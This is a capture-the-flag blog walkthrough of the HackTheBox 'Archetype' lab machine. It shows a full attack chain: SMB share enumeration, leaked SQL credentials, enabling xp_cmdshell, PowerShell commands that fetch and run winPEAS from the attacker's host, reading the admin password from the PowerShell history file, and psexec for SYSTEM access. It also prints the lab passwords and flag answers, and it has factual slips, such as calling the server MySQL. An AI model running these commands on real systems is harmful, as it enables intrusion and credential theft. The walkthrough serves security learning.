HTB Labs — Tier 2 — “Archetype” Machine Walkthrough | By: CyberAlp0

Hey Folks, this is CyberAlp0. Back again to a new walkthrough powered by HTB, Tier 1, named “Archetype”. This machine covers some tasks that will give you a walkthrough into finally finding the flag and solving the machine.
Executive Summary
Here is an executive summary of the steps we will follow:
Stage I: Scanning
Initial reconnaissance uncovers a small but high-value attack surface. Service scanning reveals an exposed Microsoft SQL Server running on TCP port 1433, alongside an SMB service on port 445 offering accessible shares. These findings immediately establish two core vectors: unauthenticated access to SMB resources and authenticated interaction with the SQL Server instance. No additional externally exploitable services are exposed, making the attack chain highly dependent on misconfigurations within these two components.
Upon the Nmap scan, we will find the following information
- Service Running: Microsoft SQL Server, and SMB
- Exposed Port: 1433, 445/TCp
Stage II: Enumeration
Enumeration begins with identifying SMB shares, where a non-administrative share named backups is openly accessible. Inside, configuration files leak valid SQL service account credentials (sql_svc: M3g4c0rp123). With these in hand, authenticated access to the SQL Server is established using Impacket tooling. Database interaction confirms the server’s configuration supports xp_cmdshell, enabling the execution of operating-system-level commands directly from the SQL interface.
Stage III: Exploiting
Exploitation proceeds through a clear privilege-escalation chain:
- Credential Harvesting via SMBPublicly accessible SMB shares provide sensitive configuration files containing SQL credentials. This misconfiguration grants authenticated access to the SQL Server instance without requiring a low-privilege foothold on the OS.
- SQL Server Command Execution via xp_cmdshellUsing mssqlclient.py, the attacker authenticates and enables xp_cmdshell, gaining the ability to run Windows commands directly from the SQL context. This acts as a bridge between the database environment and the underlying OS.
- Privilege Escalation via System EnumerationBy deploying and executing winPEAS, the attacker identifies where credential remnants are stored. The PowerShell ConsoleHost history file reveals the Administrator password (MEGACORP_4dm1n!!).
- Full Compromise via Remote ExecutionWith Administrator credentials obtained, the attacker uses Impacket’s psexec to execute commands with SYSTEM-level privileges. This grants full control over the host, enabling retrieval of both the user and root flags.
Let’s not waste more time on the introduction and begin hacking!
Step 1: Connecting to the Starting Point Labs Servers.
To attack the target machine, you have to be on the same network. You can read my blog which will guide you step-by-step into connecting to the target machine.
Step 2: Spawning the Machine and Starting to Solve the Tasks.
Task 1: Which TCP port is hosting the database server?
Answer: 1433
Walkthrough:
By Scanning the target first, we will have a pretty good knowledge about nearly everything in the machine. There are two different scanning tools, which are the Nmap & Rustscan.
Since Nmap is my favorite, I will be using it to see the open ports and what services are running.
nmap -v 10.129.95.187
You can also run the Nmap to detect the version names (-sV) and the default set of scripts (-sC).
nmap -sC -sV 10.129.95.187
You shall notice that the database used is MySQL database of version 2017. and it is operating on a TCP port 1433.
Note That: the Default TCP port for MySQL is 3306.
Task 2: What is the name of the non-administrative share available over SMB?
Answer: backups
Walkthrough:
Since the server has an open port of 445, this means that the server is likely vulnerable to the SMB “Server Message Block”, which allows any attacker inside the network to scan and list shared files or devices such as printers.
To exploit this vulnerability, we will be typing the following command
smbclient -L 10.129.95.187
We will notice that there are 4 shares inside the server. All the shares that end with the “$” sign mean that these are administrative shares. No one will be able to access or view what is inside them without permission. Hence, the only share that can be accessed without passwords is the “backups” share.
Note that : A share is a local resource on the server that is accessible to the SMB clients on the network. A share is a directory. It is used to provide a network access to the home directories on a network file server. Each user is assigned to a home directory.

We have Discussed more about the SMB in the “DANCE” Machine. You may find more information about exploiting SMB through this blog.
Task 3: What is the password identified in the file on the SMB share?
Answer: M3g4c0rp123
Walkthrough:
By making use of the available workshare named “backups”, we will exploit the opened port of 445 and connect & list the connected Shares/Devices in the network by typing the listing command using the smbclient.
smbclient --no-pass //10.129.95.187/backups
By making use of the GET command we will be able to download the file named as “prod.dtsconfig”. By viewing what’s inside this file we will be able to see that password.

Task 4: What script from the Impacket collection can be used to establish an authenticated connection to a Microsoft SQL Server?
Answer: mssqlclient.py
Walkthrough:
First of all, we need to understand the meaning of the Impacket collection. Impacket collection is a set of scripts and libraries that are written in Python. Impacket collection provides a wide range of functionalities for working with network protocols, and penetration testing.
Impacket was developed by Core Security Technologies. These bunch of scripts and libraries allow users to interact with network services and perform security-related tasks like implementing network protocols like SMB, LDAP , and Kerberos.
Note that: Impacket scripts and libraries are open source and can be found in GitHub. But it is already preconfigured in your latest kali Linux.
In the Impact Collection, the script that will be used to establish authentication with the Microsoft SQL Database is “mssqlclient.py”. It is a Python script that allows connecting to a Microsoft SQL server and executing SQL queries.
impacket-mssqlclient <hostname/ID>@IP -windows-authYou will find the hostname or the ID in the prod.dtsconfig. The ID=ARCHETYPE/sql_svc & The password=M3g4c0rp123

Connect to the server using the Impacket mssqlclient.py command as follows:
impacket-mssqlclient ARCHETYPE/sql_srv@10.129.138.22 -windows-authYou will be asked to enter the password. Just copy and paste the password and press Enter.

Task 5: What extended stored procedure of Microsoft SQL Server can be used to spawn a Windows command shell?
Answer: xp_cmdshell
Walkthrough:
In Microsoft SQL Server, the extended stored procedure that can be used to spawn a Windows command shell is called “xp_cmdshell”.
What is meant by an extended stored procedure?
It is a feature in Microsoft SQL Server that allows users to create and execute functions. These Functions take part in extending the functionality of SQL Server by integrating other programming codes like C# & C++
“xp_cmdshell” is considered one of these built-in extended stored procedures. It gives you the ability to execute commands on the operating system level from the SQL server itself. it gives you also the ability to interact with the Windows Command Line CMD and execute commands.
Bottom of line: xp_cmdshell is a stored procedure feature inside SQL servers. when using it, it will be like a channel between you and the windows operating system. You will be able to execute windows power shell commands through it.

To make use of the xp_cmdshell, You will be prompted to enable the feature. Enabling it will give you the ability to execute commands on the OS level.
enable_xp_cmdshell
To make sure everything works fine, try to execute a windows shell command like whoami and see the result.

Task 6: What script can be used to search for possible paths to escalate privileges on Windows hosts?
Answer: winPEAS
Walkthrough:
When Executing the “whoami” command using the xp_cmdshell, we have realized that we are logged in as a normal user. Thus, we need to escalate the privileges from a normal user to a more powerful user.
Walkthrough on using WinPEAS for escalating privileges:
Firstly, download the Windows Privilege Escalation Awesome Scripts (winPEAS) through this link on GitHub. Install it as shown in the following screenshot.

You can download the release pages that contains the winPEAS script that will be transferred and executed to the target machine through this link.

Secondly: Transfer WinPEASx64.exe to the target machine
WinPEAS.exe is a script that is used to escalate the privileges from normal users to admin users. Thus, we will be trying to move this script to the target machine and execute this script to escalate the privileges.
By using the wget command to download the script, we can move this script to the Apache2 server of the Kali Linux that is located in the following path /var/www/html.


Now, the script can be downloaded through typing the following link in any browser http://10.10.14.66/winPEASx64.exe.
We will use the xp_cmdshell to upload the script using the PowerShell into the target machine. Then, we will use the PowerShell to execute this script.
Thirdly: Use xp_cmdshell to download the script on the target machine and execute it.
Step 1: Printing the Working Directory
xp_cmdshell "powershell -c pwd"
Step 2: Listing what’s inside the Directory C:/Users/public
xp_cmdshell "powershell -c dir C:/Users/Public"
Step 3: Downloading the winPEASx64.exe using the PowerShell
xp_cmdshell "powershell -c cd C:/Users/Public; wget http://10.10.14.66/winPEASx64.exe"
You will notice the following error “NotSupportedException”:
wget : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet
Explorer’s first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
To solve this issue, you will have to specify the output for the script that will be downloaded, along with its extension.
xp_cmdshell "powershell -c cd C:/Users/Public; wget http://10.10.14.66/winPEASx64.exe -o winPEAS

Step 4: Executing the Script to escalate the privileges “ApplicationFailedException”
Write the following command to execute the winPEASx64.exe
xp_cmdshell "powershell -c cd C:/Users/Public; ./winPEASx64.exe"You shall encounter an error stating that the script “winPEASx64.exe” is not a valid application for the OS platform. This can be solved by downloading the other version of winPEAS.exe, which is x86.

x86 can be executed in both OS architectures (x64 & x86). You shall find the x86 version through this link.

Step 5: Downloading the x86-based script on the target machine
After following the last steps in downloading the x86 version of the WinPEAS, we will download the script using the following command on the target machine.
xp_cmdshell "powershell -c C:/Users/Public/; wget http://10.10.14.66/winPEASx86.exe -o w

Step 6: Executing the x86-based script on the target machine
Type the following command line to execute the winPEASx86.exe in the target machine and escalate the privileges. You shall find the result of the execution process in the previous screenshot.
xp_cmdshell "powershell -c cd C:/Users/Public; ./winPEASx86.exe"

We shall find that the path of the file that contains the administrator password is:
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt.
Task 7: What file contains the administrator’s password?
Answer: ConsoleHost_history.txt
Walkthrough:
By typing the following command, we will be able to list the contents of the text file that contains the admin’s password
xp_cmdshell "powershell -c cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\POr we can directly type the following
xp_cmdshell "powershell -c type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PS
The password of the admin is MEGACORP_4dm1n!!
Task 8: Submitting the user flag
Answer: 3e7b102e78218e935bf3f4951fec21a3
Walkthrough:
Again, we will get the help of the Impacket features. we will use a specific Python tool called “psexec” to gain access as an administrator and cat the contents or the user flag.
impacket-psexec Administrator@10.129.70.21
Navigate to the following path to fetch what’s inside the user flag
type C:/Users/sql_svc/Desktop/user.txt
You will find the user.txt. once you type it, you will find that the user flag is
3e7b102e78218e935bf3f4951fec21a3
Task 9: Submitting the root flag
Answer: b91ccec3305e98240082d4474b848528
Walkthrough:
You shall find the root flag in the Desktop of the administrator in the following path C:\Users\Adminsitrator\Desktop\root.txt

The Root Flag of the Archetype Machine is: b91ccec3305e98240082d4474b848528
Hope you enjoyed reading my blog about solving Archetype machine from HTB — Tier 2— Starting Point Phase.
See You in another write-up!


